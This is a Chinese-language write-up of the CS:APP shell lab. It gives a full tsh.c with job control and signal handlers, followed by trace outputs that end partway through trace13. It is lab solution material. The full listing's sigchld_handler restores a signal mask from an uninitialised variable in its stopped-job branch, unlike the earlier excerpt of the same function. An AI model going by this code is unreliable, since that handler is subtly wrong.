/* sigquit_handler - Handler for SIGQUIT: announce the signal and exit(1) */
void sigquit_handler(int sig)
{
    (void)sig;   /* the signal number is not needed */
    fputs("Terminating after receipt of SIGQUIT signal\n", stdout);
    exit(1);
}

其他的处理程序就要自己完成了

编写目标代码

补全tsh.c中剩余的代码：

void eval(char *cmdline)：解析并执行命令
int builtin_cmd(char **argv)：检测命令是否为内置命令quit、fg、bg、jobs
void do_bgfg(char **argv)：实现bg、fg命令
void waitfg(pid_t pid)：等待前台命令执行完成
void sigchld_handler(int sig)：处理SIGCHLD信号，即子进程停止或终止
void sigint_handler(int sig)：处理SIGINT信号，即来自键盘的中断ctrl-c
void sigtstp_handler(int sig)：处理SIGTSTP信号，即终端停止信号ctrl-z

Eval

void eval(char* cmdline)：解析并执行命令

void eval(char* cmdline)
{
    char* argv[MAXARGS] = { NULL };
    int FG_BG = parseline(cmdline, argv) + 1; // 获取命令存储到argv
    if (argv[0] == NULL)    return;

    if (!builtin_cmd(argv)) // 检查是否为内置命令
    {
        // 在函数内部加阻塞列表，不然之后可能会出现不痛不痒的bug
        sigset_t mask_all, mask_one, prev_one; // 定义信号集
        sigfillset(&mask_all); /* 添加所有信号到 mask_all */
        sigemptyset(&mask_one); /* 清空 mask_one */
        sigemptyset(&prev_one); /* 清空 prev_one */
        sigaddset(&mask_one, SIGCHLD); /* 添加 SIGCHLD 到 mask_one */

        pid_t fpid;
        sigprocmask(SIG_BLOCK, &mask_one, &prev_one); /* 防止子进程被调度 */
        fpid = fork(); /* 获取新进程 */
        if (!fpid)
        {
            // 子进程继承了父进程的阻塞表，也要解除阻塞(避免收不到它本身的子进程的信号)
            setpgid(0, 0); 
            sigprocmask(SIG_SETMASK, &prev_one, NULL);
            if (execve(argv[0], argv, environ) == -1) /* execve执行命令 */
            {
                printf("%s: Command not found\n", argv[0]);
                exit(0);
            }
        }
        else
        {
            // 依然是加塞，阻塞所有信号
            sigprocmask(SIG_BLOCK, &mask_all, NULL);
            addjob(jobs, fpid, FG_BG, cmdline);
            sigprocmask(SIG_SETMASK, &mask_one, NULL);

            // 后台则打印，前台则等待子进程结束
            if (FG_BG == FG)  waitfg(fpid);
            else
            {
                sigprocmask(SIG_SETMASK, &mask_all, NULL);
                int insert_jid = pid2jid(fpid);
                if (FG_BG == BG)	printf("[%d] (%d) %s", insert_jid, fpid, cmdline);
            }
        }
        sigprocmask(SIG_SETMASK, &prev_one, NULL);
    }
    return;
}

builtin_cmd

int builtin_cmd(char **argv)：检查 cmdline 是否为内置命令，并实现 jobs，quit

/*
 * builtin_cmd - Execute argv[0] if it is a builtin command.
 * Returns 1 when the command was a builtin (and has been handled),
 * 0 when it is not a builtin. "quit" terminates the shell directly.
 */
int builtin_cmd(char** argv)
{
    const char* cmd = argv[0];

    if (strcmp(cmd, "quit") == 0)
        exit(0);

    if (strcmp(cmd, "jobs") == 0) {
        listjobs(jobs);         /* print the job list */
        return 1;
    }

    if (strcmp(cmd, "bg") == 0 || strcmp(cmd, "fg") == 0) {
        do_bgfg(argv);          /* run the bg / fg command */
        return 1;
    }

    /* A lone "&" is treated as a builtin that does nothing. */
    return strcmp(cmd, "&") == 0;
}

do_bgfg

实现 bg命令 (向任务发送 SIGCONT，让已停止的任务在后台继续运行) 和 fg命令 (向任务发送 SIGCONT，把后台或已停止的任务切换到前台运行，并等待它结束)

void do_bgfg(char** argv)
{
    // 没有参数，其实应该也加上判断参数个数的语句才比较完整
    if (argv[1] == NULL)
    {
        printf("%s command requires PID or %%jobid argument\n", argv[0]);
        return;
    }

    struct job_t* job;
    int id;

    // bg %5 和 bg 5 不一样，一个是对一个任务操作，另一个是对进程操作
    // 而任务代表了一个进程组

    // 要根据tshref的样例输出看有多少种情况

    // 读到jid
    if (sscanf(argv[1], "%%%d", &id) > 0)
    {
        job = getjobjid(jobs, id); /* 对任务操作 */
        if (job == NULL)
        {
            printf("%%%d: No such job\n", id);
            return;
        }
    }
    // 读到pid
    else if (sscanf(argv[1], "%d", &id) > 0)
    {
        job = getjobpid(jobs, id); /* 对进程操作 */ 
        if (job == NULL)
        {
            printf("(%d): No such process\n", id);
            return;
        }
    }
    // 格式错误
    else
    {
        printf("%s: argument must be a PID or %%jobid\n", argv[0]);
        return;
    }
    // 因为子进程单独成组，所以kill很方便
    if (!strcmp(argv[0], "bg"))
    {
        // 进程组是负数pid，发送信号并更改状态
        kill(-(job->pid), SIGCONT);
        job->state = BG;
        printf("[%d] (%d) %s", job->jid, job->pid, job->cmdline);
    }
    else
    {
        // 如果fg后台进程，那么将它的状态转为前台进程，然后等待它终止
        kill(-(job->pid), SIGCONT);
        job->state = FG;
        waitfg(job->pid);
    }

    return;
}

waitfg

等待前台命令执行完成

void waitfg(pid_t pid)
{
    // 进程回收不需要做，只要等待前台进程就行
    sigset_t mask_temp;
    sigemptyset(&mask_temp);
    // 设定不阻塞任何信号
    // 其实可以直接sleep显式等待信号
    while (fgpid(jobs) > 0)
    	sigsuspend(&mask_temp);
    return;
}

sigchld_handler

SIGCHLD：子进程终止或停止时，内核会向父进程发送该信号；但该信号的默认处理动作为忽略，因此父进程不会自动回收子进程，需要捕捉该信号并在处理程序中完成子进程的回收

void sigchld_handler(int sig) 
{
    int olderrno = errno; /* 保存旧errno */
    pid_t pid;
    int status;
    sigset_t mask_all, prev; 
    
    sigfillset(&mask_all); /* 把所有信号放入mask_all */
    while((pid = waitpid(-1, &status, WNOHANG | WUNTRACED)) > 0)
    {
        // WNOHANG | WUNTRACED 是立即返回
        // 用WIFEXITED(status)，WIFSIGNALED(status)，WIFSTOPPED(status)等来补获终止或者被停止的子进程的退出状态
    	if (WIFEXITED(status))  // 正常退出 delete
    	{
    		sigprocmask(SIG_BLOCK, &mask_all, &prev); /* 设置全阻塞 */
    		deletejob(jobs, pid); /* 删除任务 */
    		sigprocmask(SIG_SETMASK, &prev, NULL); /* 恢复信号集 */
    	}
    	else if (WIFSIGNALED(status))  // 信号退出 delete
    	{
    	    struct job_t* job = getjobpid(jobs, pid);
            sigprocmask(SIG_BLOCK, &mask_all, &prev); /* 设置全阻塞 */
            printf("Job [%d] (%d) terminated by signal %d\n", job->jid, job->pid, WTERMSIG(status));
            deletejob(jobs, pid); /* 删除任务 */
            sigprocmask(SIG_SETMASK, &prev, NULL); /* 恢复信号集 */
    	}
    	else  // 停止 只修改状态就行
    	{
            struct job_t* job = getjobpid(jobs, pid);
            sigprocmask(SIG_BLOCK, &mask_all, &prev); /* 设置全阻塞 */
            printf("Job [%d] (%d) stopped by signal %d\n", job->jid, job->pid, WSTOPSIG(status));
            job->state= ST; /* 设置任务状态为ST */
            sigprocmask(SIG_SETMASK, &prev, NULL); /* 恢复信号集 */
        }
    }
    errno = olderrno;  // 恢复
    return;
}

sigint_handler

SIGINT：程序终止(interrupt)信号，在用户键入INTR字符(通常是Ctrl-C)时发出，用于通知前台进程组终止进程

/*
 * sigint_handler - Forward the received signal to the process group of the
 *    foreground job, if there is one. errno is preserved across the call.
 */
void sigint_handler(int sig) 
{
    const int saved_errno = errno;
    const pid_t target = fgpid(jobs);

    if (target != 0) {
        /* A negative pid addresses the whole process group. */
        kill(-target, sig);
    }
    errno = saved_errno;
}

sigtstp_handler

SIGTSTP：停止进程的运行，但该信号可以被处理和忽略，用户键入SUSP字符时(通常是Ctrl-Z)发出这个信号

/*
 * sigtstp_handler - Forward the received signal to the process group of the
 *    foreground job, if there is one. errno is preserved across the call.
 */
void sigtstp_handler(int sig) 
{
    const int saved_errno = errno;
    const pid_t target = fgpid(jobs);

    if (target != 0) {
        /* A negative pid addresses the whole process group. */
        kill(-target, sig);
    }
    errno = saved_errno;
}

完整实验代码

/*
 * tsh - A tiny shell program with job control
 *
 * <Put your name and login ID here>
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ctype.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>

 /* Misc manifest constants */
#define MAXLINE    1024   /* max line size */
#define MAXARGS     128   /* max args on a command line */
#define MAXJOBS      16   /* max jobs at any point in time */
#define MAXJID  (1<<16)   /* max job ID; parenthesized so it expands safely inside larger expressions */

/* Job states */
#define UNDEF 0 /* undefined */
#define FG 1    /* running in foreground */
#define BG 2    /* running in background */
#define ST 3    /* stopped */

/*
 * Jobs states: FG (foreground), BG (background), ST (stopped)
 * Job state transitions and enabling actions:
 *     FG -> ST  : ctrl-z
 *     ST -> FG  : fg command
 *     ST -> BG  : bg command
 *     BG -> FG  : fg command
 * At most 1 job can be in the FG state.
 */

 /* Global variables */
extern char** environ;      /* defined in libc; passed to execve() as the environment of each job */
char prompt[] = "tsh> ";    /* command line prompt (DO NOT CHANGE) */
int verbose = 0;            /* if true, print additional output (set by the -v option) */
int nextjid = 1;            /* next job ID to allocate; updated by addjob() and deletejob() */
char sbuf[MAXLINE];         /* for composing sprintf messages */

struct job_t {              /* The job struct: one slot of the job list */
    pid_t pid;              /* job PID; 0 marks an unused slot */
    int jid;                /* job ID [1, 2, ...] */
    int state;              /* UNDEF, BG, FG, or ST */
    char cmdline[MAXLINE];  /* command line that started the job */
};
struct job_t jobs[MAXJOBS]; /* The job list (fixed size, MAXJOBS slots) */
/* End global variables */


/* Function prototypes */

/* Here are the functions that you will implement */
void eval(char* cmdline);           /* parse and run one command line */
int builtin_cmd(char** argv);       /* run argv[0] if it is a builtin; returns 1 if it was */
void do_bgfg(char** argv);          /* the bg and fg builtins */
void waitfg(pid_t pid);             /* wait until there is no foreground job */

void sigchld_handler(int sig);      /* reaps terminated/stopped children */
void sigtstp_handler(int sig);      /* forwards the signal to the foreground job */
void sigint_handler(int sig);       /* forwards the signal to the foreground job */

/* Here are helper routines that we've provided for you */
int parseline(const char* cmdline, char** argv);    /* builds argv; returns the background flag */
void sigquit_handler(int sig);

/* Job list helpers */
void clearjob(struct job_t* job);
void initjobs(struct job_t* jobs);
int maxjid(struct job_t* jobs);
int addjob(struct job_t* jobs, pid_t pid, int state, char* cmdline);
int deletejob(struct job_t* jobs, pid_t pid);
pid_t fgpid(struct job_t* jobs);
struct job_t* getjobpid(struct job_t* jobs, pid_t pid);
struct job_t* getjobjid(struct job_t* jobs, int jid);
int pid2jid(pid_t pid);
void listjobs(struct job_t* jobs);

/* Error reporting and signal installation */
void usage(void);
void unix_error(char* msg);
void app_error(char* msg);
typedef void handler_t(int);        /* function type of a signal handler */
handler_t* Signal(int signum, handler_t* handler);

/*
 * main - The shell's main routine
 *
 * Parses the -h/-v/-p options, installs the signal handlers, initializes
 * the job list and then runs the read/eval loop until end of input.
 */
int main(int argc, char** argv)
{
    int c;               /* getopt() returns int; storing it in a char breaks the
                          * end-of-options test where char is unsigned */
    char cmdline[MAXLINE];
    int emit_prompt = 1; /* emit prompt (default) */

    /* Redirect stderr to stdout (so that driver will get all output
     * on the pipe connected to stdout) */
    dup2(1, 2);

    /* Parse the command line */
    while ((c = getopt(argc, argv, "hvp")) != -1) {
        switch (c) {
        case 'h':             /* print help message */
            usage();
            break;
        case 'v':             /* emit additional diagnostic info */
            verbose = 1;
            break;
        case 'p':             /* don't print a prompt */
            emit_prompt = 0;  /* handy for automatic testing */
            break;
        default:
            usage();
        }
    }

    /* Install the signal handlers */

    /* These are the ones you will need to implement */
    Signal(SIGINT, sigint_handler);   /* ctrl-c */
    Signal(SIGTSTP, sigtstp_handler);  /* ctrl-z */
    Signal(SIGCHLD, sigchld_handler);  /* Terminated or stopped child */

    /* This one provides a clean way to kill the shell */
    Signal(SIGQUIT, sigquit_handler);

    /* Initialize the job list */
    initjobs(jobs);

    /* Execute the shell's read/eval loop */
    while (1) {

        /* Read command line */
        if (emit_prompt) {
            printf("%s", prompt);
            fflush(stdout);
        }
        if ((fgets(cmdline, MAXLINE, stdin) == NULL) && ferror(stdin))
            app_error("fgets error");
        if (feof(stdin)) { /* End of file (ctrl-d) */
            fflush(stdout);
            exit(0);
        }

        /* Evaluate the command line */
        eval(cmdline);
        fflush(stdout);
    }

    exit(0); /* control never reaches here */
}

/*
 * eval - Evaluate the command line that the user has just typed in
 *
 * If the user has requested a built-in command (quit, jobs, bg or fg)
 * then execute it immediately. Otherwise, fork a child process and
 * run the job in the context of the child. If the job is running in
 * the foreground, wait for it to terminate and then return.  Note:
 * each child process must have a unique process group ID so that our
 * background children don't receive SIGINT (SIGTSTP) from the kernel
 * when we type ctrl-c (ctrl-z) at the keyboard.
*/
void eval(char* cmdline)
{
    char* argv[MAXARGS] = { NULL };
    int FG_BG = parseline(cmdline, argv) + 1;
    if (argv[0] == NULL)return;

    if (!builtin_cmd(argv))
    {
        sigset_t mask_all, mask_one, prev_one;
        sigfillset(&mask_all);
        sigemptyset(&mask_one);
        sigemptyset(&prev_one);
        sigaddset(&mask_one, SIGCHLD);

        pid_t fpid;
        sigprocmask(SIG_BLOCK, &mask_one, &prev_one);
        fpid = fork();
        if (!fpid)
        {
            setpgid(0, 0);
            sigprocmask(SIG_SETMASK, &prev_one, NULL);
            if (execve(argv[0], argv, environ) == -1)
            {
                printf("%s: Command not found\n", argv[0]);
                exit(0);
            }
        }
        else
        {
            sigprocmask(SIG_BLOCK, &mask_all, NULL);
            addjob(jobs, fpid, FG_BG, cmdline);
            sigprocmask(SIG_SETMASK, &mask_one, NULL);

            if (FG_BG == FG)waitfg(fpid);
            else
            {
                sigprocmask(SIG_BLOCK, &mask_all, NULL);
                int insert_jid = pid2jid(fpid);
                if (FG_BG == BG) printf("[%d] (%d) %s", insert_jid, fpid, cmdline);
            }
        }
        sigprocmask(SIG_SETMASK, &prev_one, NULL);
    }
    return;
}

/*
 * parseline - Parse the command line and build the argv array.
 *
 * Characters enclosed in single quotes are treated as a single
 * argument.  Return true if the user has requested a BG job, false if
 * the user has requested a FG job. A blank line also returns true, with
 * argv[0] set to NULL.
 *
 * The argv entries point into a static buffer, so they are overwritten by
 * the next call.
 * NOTE(review): the number of arguments is not checked against the capacity
 * of the caller's argv array; the caller must provide enough room.
 */
int parseline(const char* cmdline, char** argv)
{
    static char array[MAXLINE]; /* holds local copy of command line */
    char* buf = array;          /* ptr that traverses command line */
    char* delim;                /* points to the delimiter ending the current arg */
    int argc = 0;               /* number of args */
    int bg;                     /* background job? */
    size_t len;

    strcpy(buf, cmdline);
    len = strlen(buf);
    if (len > 0)                /* an empty line has no last character to replace */
        buf[len - 1] = ' ';     /* replace trailing '\n' with space */

    /* Build the argv list */
    for (;;) {
        while (*buf == ' ')     /* ignore leading spaces */
            buf++;

        if (*buf == '\'') {     /* quoted argument: runs to the closing quote */
            buf++;
            delim = strchr(buf, '\'');
        }
        else {
            delim = strchr(buf, ' ');
        }
        if (delim == NULL)
            break;

        argv[argc++] = buf;
        *delim = '\0';
        buf = delim + 1;
    }
    argv[argc] = NULL;

    if (argc == 0)  /* ignore blank line */
        return 1;

    /* should the job run in the background? */
    bg = (*argv[argc - 1] == '&');
    if (bg)
        argv[--argc] = NULL;
    return bg;
}

/*
 * builtin_cmd - If the user has typed a built-in command then execute
 *    it immediately. Returns 1 for a builtin, 0 otherwise; "quit"
 *    terminates the shell directly.
 */
int builtin_cmd(char** argv)
{
    const char* cmd = argv[0];

    if (strcmp(cmd, "quit") == 0)
        exit(0);

    if (strcmp(cmd, "jobs") == 0) {
        listjobs(jobs);
        return 1;
    }

    if (strcmp(cmd, "bg") == 0 || strcmp(cmd, "fg") == 0) {
        do_bgfg(argv);
        return 1;
    }

    /* A lone "&" is treated as a builtin that does nothing. */
    return strcmp(cmd, "&") == 0;
}

/*
 * do_bgfg - Execute the builtin bg and fg commands
 */
void do_bgfg(char** argv)
{
    if (argv[1] == NULL)
    {
        printf("%s command requires PID or %%jobid argument\n", argv[0]);
        return;
    }

    struct job_t* job;
    int id;

    if (sscanf(argv[1], "%%%d", &id) > 0)
    {
        job = getjobjid(jobs, id);
        if (job == NULL)
        {
            printf("%%%d: No such job\n", id);
            return;
        }
    }
    else if (sscanf(argv[1], "%d", &id) > 0)
    {
        job = getjobpid(jobs, id);
        if (job == NULL)
        {
            printf("(%d): No such process\n", id);
            return;
        }
    }
    else
    {
        printf("%s: argument must be a PID or %%jobid\n", argv[0]);
        return;
    }
    if (!strcmp(argv[0], "bg"))
    {
        kill(-(job->pid), SIGCONT);
        job->state = BG;
        printf("[%d] (%d) %s", job->jid, job->pid, job->cmdline);
    }
    else
    {
        kill(-(job->pid), SIGCONT);
        job->state = FG;
        waitfg(job->pid);
    }
    return;
}

/*
 * waitfg - Block until process pid is no longer the foreground process
 */
void waitfg(pid_t pid)
{
    sigset_t mask_temp;
    sigemptyset(&mask_temp);
    while (fgpid(jobs) > 0)
        sigsuspend(&mask_temp);
    return;
}

/*****************
 * Signal handlers
 *****************/

 /*
  * sigchld_handler - The kernel sends a SIGCHLD to the shell whenever
  *     a child job terminates (becomes a zombie), or stops because it
  *     received a SIGSTOP or SIGTSTP signal. The handler reaps all
  *     available zombie children, but doesn't wait for any other
  *     currently running children to terminate.
  */
void sigchld_handler(int sig)
{
    int olderrno = errno;
    pid_t pid;
    int status;
    sigset_t mask_all, prev;

    sigfillset(&mask_all);
    while ((pid = waitpid(-1, &status, WNOHANG | WUNTRACED)) > 0)
    {
        if (WIFEXITED(status))
        {
            sigprocmask(SIG_BLOCK, &mask_all, &prev);
            deletejob(jobs, pid);
            sigprocmask(SIG_SETMASK, &prev, NULL);
        }
        else if (WIFSIGNALED(status))
        {
            struct job_t* job = getjobpid(jobs, pid);
            sigprocmask(SIG_BLOCK, &mask_all, &prev);
            printf("Job [%d] (%d) terminated by signal %d\n", job->jid, job->pid, WTERMSIG(status));
            deletejob(jobs, pid);
            sigprocmask(SIG_SETMASK, &prev, NULL);
        }
        else
        {
            struct job_t* job = getjobpid(jobs, pid);
            sigprocmask(SIG_BLOCK, &mask_all, NULL);
            printf("Job [%d] (%d) stopped by signal %d\n", job->jid, job->pid, WSTOPSIG(status));
            job->state = ST;
            sigprocmask(SIG_SETMASK, &prev, NULL);
        }
    }
    errno = olderrno;
    return;
}

/*
 * sigint_handler - The kernel sends a SIGINT to the shell whenever the
 *    user types ctrl-c at the keyboard.  Catch it and pass it on to the
 *    process group of the foreground job, if there is one.
 */
void sigint_handler(int sig)
{
    const int saved_errno = errno;
    const pid_t target = fgpid(jobs);

    if (target != 0) {
        /* A negative pid addresses the whole process group. */
        kill(-target, sig);
    }
    errno = saved_errno;
}

/*
 * sigtstp_handler - The kernel sends a SIGTSTP to the shell whenever
 *     the user types ctrl-z at the keyboard. Catch it and pass it on to
 *     the process group of the foreground job, if there is one.
 */
void sigtstp_handler(int sig)
{
    const int saved_errno = errno;
    const pid_t target = fgpid(jobs);

    if (target != 0) {
        /* A negative pid addresses the whole process group. */
        kill(-target, sig);
    }
    errno = saved_errno;
}

/*********************
 * End signal handlers
 *********************/

 /***********************************************
  * Helper routines that manipulate the job list
  **********************************************/

  /* clearjob - Clear the entries in a job struct */
void clearjob(struct job_t* job) {
    /* Reset every field so the slot reads as unused (pid 0, state UNDEF). */
    job->cmdline[0] = '\0';
    job->state = UNDEF;
    job->jid = 0;
    job->pid = 0;
}

/* initjobs - Initialize the job list */
void initjobs(struct job_t* jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
        clearjob(&jobs[i]);
}

/* maxjid - Return the highest job ID stored in the list (0 if there is none) */
int maxjid(struct job_t* jobs)
{
    int largest = 0;

    for (int idx = 0; idx < MAXJOBS; idx++) {
        int jid = jobs[idx].jid;
        largest = (jid > largest) ? jid : largest;
    }
    return largest;
}

/*
 * addjob - Store a new job in the first free slot of the job list.
 * Returns 1 on success, 0 if pid is invalid or the list is full.
 */
int addjob(struct job_t* jobs, pid_t pid, int state, char* cmdline)
{
    struct job_t* slot = NULL;

    if (pid < 1)
        return 0;

    /* A slot whose pid is 0 is unused; take the first one. */
    for (int idx = 0; idx < MAXJOBS && slot == NULL; idx++) {
        if (jobs[idx].pid == 0)
            slot = &jobs[idx];
    }

    if (slot == NULL) {
        printf("Tried to create too many jobs\n");
        return 0;
    }

    slot->pid = pid;
    slot->state = state;
    slot->jid = nextjid;
    nextjid++;
    if (nextjid > MAXJOBS)      /* wrap the job ID counter */
        nextjid = 1;
    strcpy(slot->cmdline, cmdline);
    if (verbose)
        printf("Added job [%d] %d %s\n", slot->jid, slot->pid, slot->cmdline);
    return 1;
}

/*
 * deletejob - Remove the job whose PID equals pid from the job list.
 * Returns 1 if a job was removed, 0 otherwise.
 */
int deletejob(struct job_t* jobs, pid_t pid)
{
    if (pid >= 1) {
        for (int idx = 0; idx < MAXJOBS; idx++) {
            if (jobs[idx].pid != pid)
                continue;
            clearjob(&jobs[idx]);
            /* The next ID follows the largest ID still in use. */
            nextjid = maxjid(jobs) + 1;
            return 1;
        }
    }
    return 0;
}

/* fgpid - PID of the first job in the FG state, or 0 when there is none */
pid_t fgpid(struct job_t* jobs) {
    int idx = 0;

    while (idx < MAXJOBS) {
        if (jobs[idx].state == FG)
            return jobs[idx].pid;
        idx++;
    }
    return 0;
}

/* getjobpid  - Find a job (by PID) on the job list */
struct job_t* getjobpid(struct job_t* jobs, pid_t pid) {
    int i;

    if (pid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].pid == pid)
            return &jobs[i];
    return NULL;
}

/* getjobjid  - Find a job (by JID) on the job list */
struct job_t* getjobjid(struct job_t* jobs, int jid)
{
    int i;

    if (jid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid == jid)
            return &jobs[i];
    return NULL;
}

/* pid2jid - Translate a process ID into its job ID (0 if pid is invalid or unknown) */
int pid2jid(pid_t pid)
{
    int found = 0;

    /* Searches the global job list rather than a list passed by the caller. */
    for (int idx = 0; pid >= 1 && idx < MAXJOBS; idx++) {
        if (jobs[idx].pid == pid) {
            found = jobs[idx].jid;
            break;
        }
    }
    return found;
}

/* listjobs - Print the job list */
void listjobs(struct job_t* jobs)
{
    int i;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid != 0) {
            printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
            switch (jobs[i].state) {
            case BG:
                printf("Running ");
                break;
            case FG:
                printf("Foreground ");
                break;
            case ST:
                printf("Stopped ");
                break;
            default:
                printf("listjobs: Internal error: job[%d].state=%d ",
                    i, jobs[i].state);
            }
            printf("%s", jobs[i].cmdline);
        }
    }
}
/******************************
 * end job list helper routines
 ******************************/


 /***********************
  * Other helper routines
  ***********************/

  /*
   * usage - print a help message
   */
void usage(void)
{
    /* Print the option summary on stdout and terminate with status 1. */
    fputs("Usage: shell [-hvp]\n"
          "   -h   print this message\n"
          "   -v   print additional diagnostic information\n"
          "   -p   do not emit a command prompt\n", stdout);
    exit(1);
}

/*
 * unix_error - Print msg followed by the description of the current errno
 *              on stdout, then exit with status 1.
 */
void unix_error(char* msg)
{
    const char* reason = strerror(errno);

    printf("%s: %s\n", msg, reason);
    exit(1);
}

/*
 * app_error - Print an application-level error message on stdout,
 *             then exit with status 1.
 */
void app_error(char* msg)
{
    printf("%s\n", msg);
    exit(1);
}

/*
 * Signal - Install handler for signum through sigaction() and return the
 *          previously installed handler. Exits via unix_error() on failure.
 */
handler_t* Signal(int signum, handler_t* handler)
{
    struct sigaction new_act;
    struct sigaction prev_act;

    sigemptyset(&new_act.sa_mask);   /* no additional signals in the handler mask */
    new_act.sa_flags = SA_RESTART;   /* restart syscalls if possible */
    new_act.sa_handler = handler;

    if (sigaction(signum, &new_act, &prev_act) < 0)
        unix_error("Signal error");
    return prev_act.sa_handler;
}

/*
 * sigquit_handler - Handler for SIGQUIT: announce the signal on stdout
 *    and terminate the shell with status 1.
 */
void sigquit_handler(int sig)
{
    (void)sig;   /* the signal number is not needed */
    fputs("Terminating after receipt of SIGQUIT signal\n", stdout);
    exit(1);
}

实验验证

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace01.txt -s ./tsh -a "-p"
#
# trace01.txt - Properly terminate on EOF.
#

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace02.txt -s ./tsh -a "-p"
#
# trace02.txt - Process builtin quit command.
#

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace03.txt -s ./tsh -a "-p"
#
# trace03.txt - Run a foreground job.
#
tsh> quit

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace04.txt -s ./tsh -a "-p"
#
# trace04.txt - Run a background job.
#
tsh> ./myspin 1 &
[1] (8422) ./myspin 1 &

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace05.txt -s ./tsh -a "-p"
#
# trace05.txt - Process jobs builtin command.
#
tsh> ./myspin 2 &
[1] (8428) ./myspin 2 &
tsh> ./myspin 3 &
[2] (8430) ./myspin 3 &
tsh> jobs
[1] (8428) Running ./myspin 2 &
[2] (8430) Running ./myspin 3 &

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace06.txt -s ./tsh -a "-p"
#
# trace06.txt - Forward SIGINT to foreground job.
#
tsh> ./myspin 4
Job [1] (8441) terminated by signal 2

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace07.txt -s ./tsh -a "-p"
#
# trace07.txt - Forward SIGINT only to foreground job.
#
tsh> ./myspin 4 &
[1] (8447) ./myspin 4 &
tsh> ./myspin 5
Job [2] (8449) terminated by signal 2
tsh> jobs
[1] (8447) Running ./myspin 4 &

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace08.txt -s ./tsh -a "-p"
#
# trace08.txt - Forward SIGTSTP only to foreground job.
#
tsh> ./myspin 4 &
[1] (8458) ./myspin 4 &
tsh> ./myspin 5
Job [2] (8460) stopped by signal 20
tsh> jobs
[1] (8458) Running ./myspin 4 &
[2] (8460) Stopped ./myspin 5

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace09.txt -s ./tsh -a "-p"
#
# trace09.txt - Process bg builtin command
#
tsh> ./myspin 4 &
[1] (8467) ./myspin 4 &
tsh> ./myspin 5
Job [2] (8469) stopped by signal 20
tsh> jobs
[1] (8467) Running ./myspin 4 &
[2] (8469) Stopped ./myspin 5 
tsh> bg %2
[2] (8469) ./myspin 5 
tsh> jobs
[1] (8467) Running ./myspin 4 &
[2] (8469) Running ./myspin 5

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace10.txt -s ./tsh -a "-p"
#
# trace10.txt - Process fg builtin command. 
#
tsh> ./myspin 4 &
[1] (8478) ./myspin 4 &
tsh> fg %1
Job [1] (8478) stopped by signal 20
tsh> jobs
[1] (8478) Stopped ./myspin 4 &
tsh> fg %1
tsh> jobs

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace11.txt -s ./tsh -a "-p"
#
# trace11.txt - Forward SIGINT to every process in foreground process group
#
tsh> ./mysplit 4
Job [1] (8489) terminated by signal 2
tsh> /bin/ps a
    PID TTY      STAT   TIME COMMAND
   1050 tty2     Ssl+   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
   1058 tty2     Sl+    0:10 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keeptty -verbose 3
   1385 tty2     Sl+    0:00 /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu
   4288 pts/0    Ss     0:00 -/bin/zsh
   8486 pts/0    S+     0:00 /usr/bin/perl ./sdriver.pl -t trace11.txt -s ./tsh -a -p
   8487 pts/0    S+     0:00 ./tsh -p
   8492 pts/0    R      0:00 /bin/ps a

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace12.txt -s ./tsh -a "-p" 
#
# trace12.txt - Forward SIGTSTP to every process in foreground process group
#
tsh> ./mysplit 4
Job [1] (8507) stopped by signal 20
tsh> jobs
[1] (8507) Stopped ./mysplit 4 
tsh> /bin/ps a
    PID TTY      STAT   TIME COMMAND
   1050 tty2     Ssl+   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
   1058 tty2     Sl+    0:11 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keeptty -verbose 3
   1385 tty2     Sl+    0:00 /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu
   4288 pts/0    Ss     0:00 -/bin/zsh
   8504 pts/0    S+     0:00 /usr/bin/perl ./sdriver.pl -t trace12.txt -s ./tsh -a -p
   8505 pts/0    S+     0:00 ./tsh -p
   8507 pts/0    T      0:00 ./mysplit 4
   8508 pts/0    T      0:00 ./mysplit 4
   8511 pts/0    R      0:00 /bin/ps a

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace13.txt -s ./tsh -a "-p"
#
# trace13.txt - Restart every stopped process in process group
#
tsh> ./mysplit 4
Job [1] (8517) stopped by signal 20
tsh> jobs
[1] (8517) Stopped ./mysplit 4 
tsh> /bin/ps a
    PID TTY      STAT   TIME COMMAND
   1050 tty2     Ssl+   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
   1058 tty2     Sl+    0:11 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keeptty -verbose 3
   1385 tty2     Sl+    0:00 /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu
   4288 pts/0    Ss     0:00 -/bin/zsh
   8514 pts/0    S+     0:00 /usr/bin/perl ./sdriver.pl -t trace13.txt -s ./tsh -a -p
   8515 pts/0    S+     0:00 ./tsh -p
